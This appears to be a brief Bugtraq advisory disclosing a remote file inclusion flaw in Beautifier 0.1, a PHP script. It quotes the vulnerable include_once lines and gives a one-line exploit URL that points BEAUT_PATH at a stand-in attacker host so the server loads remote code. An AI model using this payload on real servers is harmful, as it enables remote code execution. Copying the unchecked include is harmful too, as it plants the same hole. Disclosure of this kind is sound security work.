Beautifier Version 0.1 Remote File Include Vulnerability //- MefistoLabs.Com

From: ilkerkandemir@mynet.com
To: bugtraq@securityfocus.com
Cc:
Subject: Beautifier Version 0.1 Remote File Include Vulnerability //- MefistoLabs.Com
Date:


-------------------------------------------------------------------------------------------------------------------

MefistoLabs.Com PreSents...


Script: Beautifier Version 0.1
Script Download1: http://www.beautifier.org/php/beautifier-php-full-current.tar.gz
Script Download2: http://freshmeat.net/projects/beautifier/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include_once($BEAUT_PATH."/Beautifier/HFile.php");
include_once($BEAUT_PATH."/Beautifier/Context.php");

-------------------------------------------------------------------------------------------------------------------

Exploit:  [Beautifier_path]/Beautifier/Core.php?BEAUT_PATH=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx: Ajann,Dumenci,H0tTurk,Str0ke

# MefistoLabs.Com 





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.